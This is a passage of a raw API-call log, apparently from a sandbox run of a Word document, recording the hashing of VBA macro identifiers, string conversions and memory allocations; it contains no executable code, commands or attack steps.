szName="VB_GlobalNameSpace") returned 0x10ce77 [0030.203] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0030.203] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0030.203] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Creatable") returned 0x101d92 [0030.203] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0030.203] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0030.203] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_PredeclaredId") returned 0x105fc7 [0030.203] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0030.203] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0030.203] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Exposed") returned 0x1030b3 [0030.203] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0030.203] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0030.203] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_TemplateDerived") returned 0x109f1e [0030.203] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0030.204] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0030.204] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Customizable") returned 0x10c26d [0030.204] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0030.204] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.204] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="doc_of_word_outline_level6") returned 0x101d1d [0030.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a5006a, cbMultiByte=26, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 26 [0030.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a5006a, cbMultiByte=26, lpWideCharStr=0xb4e31c8, cchWideChar=26 | out: lpWideCharStr="doc_of_word_outline_level6") returned 26 [0030.204] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="doc_string") returned 0x105248 [0030.204] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.204] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.204] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.204] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="word_outline_level6") returned 0x10d28b [0030.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a500d2, cbMultiByte=19, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19 [0030.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a500d2, cbMultiByte=19, lpWideCharStr=0x76d6148, cchWideChar=19 | out: lpWideCharStr="word_outline_level6") returned 19 [0030.204] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Selection") returned 0x10ae5a [0030.204] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Paragraphs") returned 0x1066f9 [0030.204] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="OutlineLevel") returned 0x109ad5 [0030.204] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wdOutlineLevel6") returned 0x1010e9 [0030.204] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="comple") returned 0x101453 [0030.204] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="te") returned 0x105f3e [0030.204] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.204] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.204] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.204] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WriteLOG") returned 0x10757b [0030.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a5020a, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0030.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a5020a, cbMultiByte=8, lpWideCharStr=0x766cf98, cchWideChar=8 | out: lpWideCharStr="WriteLOG") returned 8 [0030.204] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="sMessage") returned 0x10e36d [0030.205] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.205] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="bLOGOn") returned 0x10a3c6 [0030.205] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="cOn") returned 0x107f4a [0030.205] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.205] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Wri") returned 0x10e54f [0030.205] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="te") returned 0x105f3e [0030.205] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="nLOGFileHandle") returned 0x10cb06 [0030.205] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="sMessage") returned 0x10e36d [0030.205] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.205] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.205] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.205] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.205] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Public") returned 0x101287 [0030.205] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.205] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="peascock") returned 0x10878c [0030.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a50302, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0030.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a50302, cbMultiByte=8, lpWideCharStr=0x766cf98, cchWideChar=8 | out: lpWideCharStr="peascock") returned 8 [0030.205] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="SubProperty") returned 0x109bbc [0030.205] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Write") returned 0x105c2e [0030.205] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Bonez_Dadly_PokerFace") returned 0x10fd2f [0030.205] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GoTo") returned 0x10d70b [0030.205] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="cip") returned 0x107e6e [0030.205] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.205] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Not") returned 0x10ba23 [0030.205] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CryToLoad") returned 0x10165c [0030.205] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Compressed") returned 0x10108f [0030.205] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.206] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="For") returned 0x108f59 [0030.206] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="G") returned 0x10105e [0030.206] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="To") returned 0x105f48 [0030.206] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CryToLoad") returned 0x10165c [0030.206] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Size") returned 0x10fbee [0030.206] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CryToLoad") returned 0x10165c [0030.206] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Data") returned 0x103b06 [0030.206] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="G") returned 0x10105e [0030.206] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ByteTo") returned 0x10975d [0030.206] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="SignedInt") returned 0x10ffac [0030.206] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Rea") returned 0x10ce02 [0030.206] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="dHEX") returned 0x105e61 [0030.206] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LoadedROM") returned 0x10cabe [0030.206] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="cryOffset") returned 0x10f7e8 [0030.206] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="G") returned 0x10105e [0030.206] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Next") returned 0x1009bb [0030.206] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Else") returned 0x103b56 [0030.206] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.206] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Alignment") returned 0x1049a4 [0030.206] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.206] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pcmLevel") returned 0x10cc0a [0030.206] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ByteTo") returned 0x10975d [0030.206] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="SignedInt") returned 0x10ffac [0030.206] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Rea") returned 0x10ce02 [0030.206] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="dHEX") returned 0x105e61 [0030.206] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LoadedROM") returned 0x10cabe [0030.206] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="offtrack") returned 0x100c71 [0030.207] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="offtrack") returned 0x100c71 [0030.207] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="offtrack") returned 0x100c71 [0030.207] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Data") returned 0x103b06 [0030.207] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Add") returned 0x1072f7 [0030.207] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pcmLevel") returned 0x10cc0a [0030.207] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Alignment") returned 0x1049a4 [0030.207] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.207] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.207] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="offtrack") returned 0x100c71 [0030.207] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="offtrack") returned 0x100c71 [0030.207] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.207] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Alignment") returned 0x1049a4 [0030.207] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.207] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Data") returned 0x103b06 [0030.207] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Add") returned 0x1072f7 [0030.207] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pcmLevel") returned 0x10cc0a [0030.207] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.207] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.207] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Data") returned 0x103b06 [0030.207] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Add") returned 0x1072f7 [0030.207] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pcmLevel") returned 0x10cc0a [0030.207] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.207] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Size") returned 0x10fbee [0030.208] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CryToLoad") returned 0x10165c [0030.208] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Size") returned 0x10fbee [0030.208] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.208] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.208] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.208] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Alignment") returned 0x1049a4 [0030.209] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CryToLoad") returned 0x10165c [0030.209] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Data") returned 0x103b06 [0030.209] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Data") returned 0x103b06 [0030.209] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ToArray") returned 0x10e0fa [0030.209] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CryToLoad") returned 0x10165c [0030.209] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Size") returned 0x10fbee [0030.209] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="offtrack") returned 0x100c71 [0030.209] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Start") returned 0x1006be [0030.209] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.209] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.209] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="cip") returned 0x107e6e [0030.209] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.209] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Bonez_Dadly_Fish") returned 0x10c952 [0030.209] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.209] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Exit") returned 0x107a1f [0030.209] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.209] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.210] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.210] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FindNext") returned 0x1075d3 [0030.210] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.210] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.210] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.210] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="doc_of_word_outline_level7") returned 0x101d1e [0030.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a5069e, cbMultiByte=26, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 26 [0030.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a5069e, cbMultiByte=26, lpWideCharStr=0xb4e31c8, cchWideChar=26 | out: lpWideCharStr="doc_of_word_outline_level7") returned 26 [0030.210] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="doc_string") returned 0x105248 [0030.210] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.210] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.210] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.210] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="word_outline_level7") returned 0x10d28c [0030.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a506da, cbMultiByte=19, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19 [0030.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a506da, cbMultiByte=19, lpWideCharStr=0x76d6148, cchWideChar=19 | out: lpWideCharStr="word_outline_level7") returned 19 [0030.210] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Selection") returned 0x10ae5a [0030.210] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Paragraphs") returned 0x1066f9 [0030.210] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="OutlineLevel") returned 0x109ad5 [0030.210] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wdOutlineLevel7") returned 0x1010ea [0030.210] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="comple") returned 0x101453 [0030.210] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="te") returned 0x105f3e [0030.210] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.210] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.210] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.210] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ErrorMessage") returned 0x10e066 [0030.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a5073e, cbMultiByte=12, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0030.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a5073e, cbMultiByte=12, lpWideCharStr=0x76d6148, cchWideChar=12 | out: lpWideCharStr="ErrorMessage") returned 12 [0030.210] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="sMessage") returned 0x10e36d [0030.210] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="sMessage" | out: _Dst="sMessage") returned 0x0 [0030.210] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="sMessage") returned 0x10e36d [0030.210] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.210] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="bLOGOn") returned 0x10a3c6 [0030.210] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="cOn") returned 0x107f4a [0030.210] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.210] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WriteLOG") returned 0x10757b [0030.210] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="WriteLOG" | out: _Dst="WriteLOG") returned 0x0 [0030.210] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="sMessage") returned 0x10e36d [0030.210] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Else") returned 0x103b56 [0030.211] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MsgBox") returned 0x105297 [0030.211] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="sMessage") returned 0x10e36d [0030.211] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="sMessage" | out: _Dst="sMessage") returned 0x0 [0030.211] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.211] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.211] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.211] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.211] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.211] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InfoMessage") returned 0x105326 [0030.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a50796, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0030.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a50796, cbMultiByte=11, lpWideCharStr=0x766cf98, cchWideChar=11 | out: lpWideCharStr="InfoMessage") returned 11 [0030.211] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="sMessage") returned 0x10e36d [0030.211] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="sMessage" | out: _Dst="sMessage") returned 0x0 [0030.211] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="sMessage") returned 0x10e36d [0030.211] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.211] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="bShowErrorsOnly") returned 0x104621 [0030.211] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="cOff") returned 0x10be45 [0030.211] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.211] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.211] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="bLOGOn") returned 0x10a3c6 [0030.211] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="cOn") returned 0x107f4a [0030.211] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.211] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WriteLOG") returned 0x10757b [0030.211] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="WriteLOG" | out: _Dst="WriteLOG") returned 0x0 [0030.211] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="sMessage") returned 0x10e36d [0030.211] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Else") returned 0x103b56 [0030.211] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MsgBox") returned 0x105297 [0030.211] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="sMessage") returned 0x10e36d [0030.211] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="sMessage" | out: _Dst="sMessage") returned 0x0 [0030.211] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.211] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.211] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.211] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.211] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.211] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.211] CExposedStream::Read () returned 0x0 [0030.211] CExposedStream::Release () returned 0x1 [0030.211] CExposedStream::Release () returned 0x0 [0030.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Class1", cchWideChar=7, lpMultiByteStr=0x2e6560, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Class1", lpUsedDefaultChar=0x0) returned 7 [0030.212] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Class1") returned 0x102b7f [0030.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Class1", cchWideChar=7, lpMultiByteStr=0x2e66a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Class1", lpUsedDefaultChar=0x0) returned 7 [0030.212] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Class1") returned 0x102b7f [0030.212] IMalloc:Alloc (This=0x7fefe015380, cb=0x80) returned 0x7837c90 [0030.212] IMalloc:GetSize (This=0x7fefe015380, pv=0x7837c90) returned 0x80 [0030.212] IMalloc:Alloc (This=0x7fefe015380, cb=0xb8) returned 0xb51d580 [0030.212] IMalloc:Alloc (This=0x7fefe015380, cb=0xb8) returned 0xb51d640 [0030.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Class1", cchWideChar=7, lpMultiByteStr=0x2e6560, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Class1", lpUsedDefaultChar=0x0) returned 7 [0030.212] CoCreateGuid (in: pguid=0x2e6290 | out: pguid=0x2e6290*(Data1=0xde39b9bb, Data2=0x2158, Data3=0x4f91, Data4=([0]=0x82, [1]=0x97, [2]=0xbc, [3]=0xc9, [4]=0x8f, [5]=0x30, [6]=0x91, [7]=0x35))) returned 0x0 [0030.212] CoCreateGuid (in: pguid=0x2e62a0 | out: pguid=0x2e62a0*(Data1=0xcce4aa5a, Data2=0x85c, Data3=0x4187, Data4=([0]=0xba, [1]=0x25, [2]=0xd9, [3]=0xe4, [4]=0x25, [5]=0x2d, [6]=0xc8, [7]=0x6a))) returned 0x0 [0030.212] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Class1", cchWideChar=7, lpMultiByteStr=0x2e62b0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Class1", lpUsedDefaultChar=0x0) returned 7 [0030.212] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Class1") returned 0x102b7f [0030.212] GetLocalTime (in: lpSystemTime=0x2e6188 | out: lpSystemTime=0x2e6188*(wYear=0x7e1, wMonth=0x8, wDayOfWeek=0x4, wDay=0x11, wHour=0xd, wMinute=0x35, wSecond=0x21, wMilliseconds=0x63)) [0030.212] _ultow_s (in: _Value=0x5b6852dd, _Buffer=0xb4c659c, _BufferCount=0x9, _Radix=16 | out: _Buffer="5b6852dd") returned 0x0 [0030.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="045b6852dd", cchWideChar=11, lpMultiByteStr=0x2e6120, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="045b6852dd", lpUsedDefaultChar=0x0) returned 11 [0030.212] strcpy_s (in: _Dst=0x78013b0, _DstSize=0x7, _Src="Class1" | out: _Dst="Class1") returned 0x0 [0030.212] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Class1") returned 0x102b7f [0030.213] wcscpy_s (in: _Destination=0xb4c65b0, _SizeInWords=0x7, _Source="Class1" | out: _Destination="Class1") returned 0x0 [0030.213] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Class1") returned 0x102b7f [0030.213] wcscpy_s (in: _Destination=0xb4c65c0, _SizeInWords=0x7, _Source="Class1" | out: _Destination="Class1") returned 0x0 [0030.213] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Class1") returned 0x102b7f [0030.213] IMalloc:Alloc (This=0x7fefe015380, cb=0x78) returned 0xb46e9b0 [0030.213] IMalloc:Free (This=0x7fefe015380, pv=0xb462300) [0030.213] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x76687c0 [0030.213] IMalloc:Free (This=0x7fefe015380, pv=0xb46e9b0) [0030.213] IMalloc:Alloc (This=0x7fefe015380, cb=0x3d0) returned 0xb512590 [0030.213] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x76687c0 [0030.213] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490130 [0030.213] IMalloc:Alloc (This=0x7fefe015380, cb=0x80) returned 0x7837d20 [0030.213] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0xb4f6060 [0030.213] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0xb4f6070 [0030.213] IMalloc:Alloc (This=0x7fefe015380, cb=0x688) returned 0xb512970 [0030.213] IMalloc:Alloc (This=0x7fefe015380, cb=0x80) returned 0x7837db0 [0030.213] IMalloc:Alloc (This=0x7fefe015380, cb=0x640) returned 0xb513000 [0030.213] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7668790 [0030.213] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0xb4f6080 [0030.213] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0xb4f6090 [0030.213] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7668730 [0030.213] IMalloc:Alloc (This=0x7fefe015380, cb=0x80) returned 0x7837e40 [0030.213] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_Evaluate") returned 0x10d918 [0030.213] wcsncpy_s (in: _Destination=0x2e6300, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc") returned 0x0 [0030.213] CharLowerBuffW (in: 